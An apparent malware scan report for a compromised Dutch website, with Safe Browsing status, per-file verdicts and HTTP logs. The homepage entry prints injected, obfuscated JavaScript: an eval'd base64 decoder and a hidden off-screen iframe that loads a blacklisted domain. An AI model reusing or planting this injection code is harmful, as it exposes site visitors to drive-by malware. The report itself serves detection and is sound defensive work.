Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kokenmetstoomovens.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kokenmetstoomovens.com/ | 200 OK Content-Length: 7672 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: vwibwb9db25.org eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgY ...[900 bytes skipped]... Decoded script: ...[1332 bytes skipped]... olute;left:-1000px;top:-1000px;'></i"+fff+"e>"); } function iframer() { var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://vwibwb9db25.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> | ||
http://kokenmetstoomovens.com/swfobject.js | 200 OK Content-Length: 9759 Content-Type: application/javascript | clean |
http://kokenmetstoomovens.com/test404page.js | 404 Not Found Content-Length: 492 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kokenmetstoomovens.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 20:55:08 GMT
Accept-Ranges: bytes
ETag: "2600cfa-1df8-4cbde673acfe5"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7672
Content-Type: text/html
Last-Modified: Fri, 12 Oct 2012 15:33:01 GMT
...7672 bytes of data.
GET / HTTP/1.1
Host: kokenmetstoomovens.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 20:55:08 GMT
Accept-Ranges: bytes
ETag: "2600cfa-1df8-4cbde673acfe5"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7672
Content-Type: text/html
Last-Modified: Fri, 12 Oct 2012 15:33:01 GMT
...7672 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kokenmetstoomovens.com
Referer: http://www.google.com/search?q=kokenmetstoomovens.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kokenmetstoomovens.com
Referer: http://www.google.com/search?q=kokenmetstoomovens.com
Result:
The result is similar to the first query. There are no suspicious redirects found.